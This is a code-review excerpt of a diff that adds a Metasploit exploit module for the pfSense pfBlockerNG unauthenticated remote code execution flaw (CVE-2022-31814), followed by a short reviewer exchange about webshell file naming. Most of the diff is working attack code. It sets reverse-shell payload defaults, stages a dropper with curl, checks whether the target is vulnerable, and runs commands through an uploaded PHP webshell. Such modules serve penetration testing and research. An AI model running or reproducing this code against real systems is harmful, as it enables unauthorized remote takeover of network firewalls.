modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb

```diff
@@ -0,0 +1,154 @@
+          [ 'CVE', '2022-31814' ],
+          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'BSD Dropper',
+            {
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X64],
+              'Type' => :bsd_dropper,
+              'CmdStagerFlavor' => [ 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2022-09-05',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WEBSHELL_NAME', [
+          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset. The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17 (not including the .php exetention) ', nil
+        ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'method' => 'GET'
+    )
+
+    return Exploit::CheckCode::Safe('Could not connect to web service - no response') if res.nil?
+    return Exploit::CheckCode::Safe("pfBlockerNG does not appear to be installed - (response code: #{res.code})") if res.code != 200
+
+    if res.body.include?('GIF') && res.headers['Content-Type'] == 'image/gif'
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}?c=#{Rex::Text.uri_encode(cmd)}"),
+      'headers' => {
+        'Accept' => '*/*',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8',
+        'Connection' => 'keep-alive'
+      }
+    })
+  end
+
+  def exploit
+    print_status 'Uploading shell...'
+    # The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha([5, 8, 11, 14, 17].sample)}.php"
```

Comment:
You may want to check that the user followed instructions here and verify the name or only let the generated name be used.

Reply:
After implementing improvements suggested above, we no longer have restricts on the webshell name length 🎉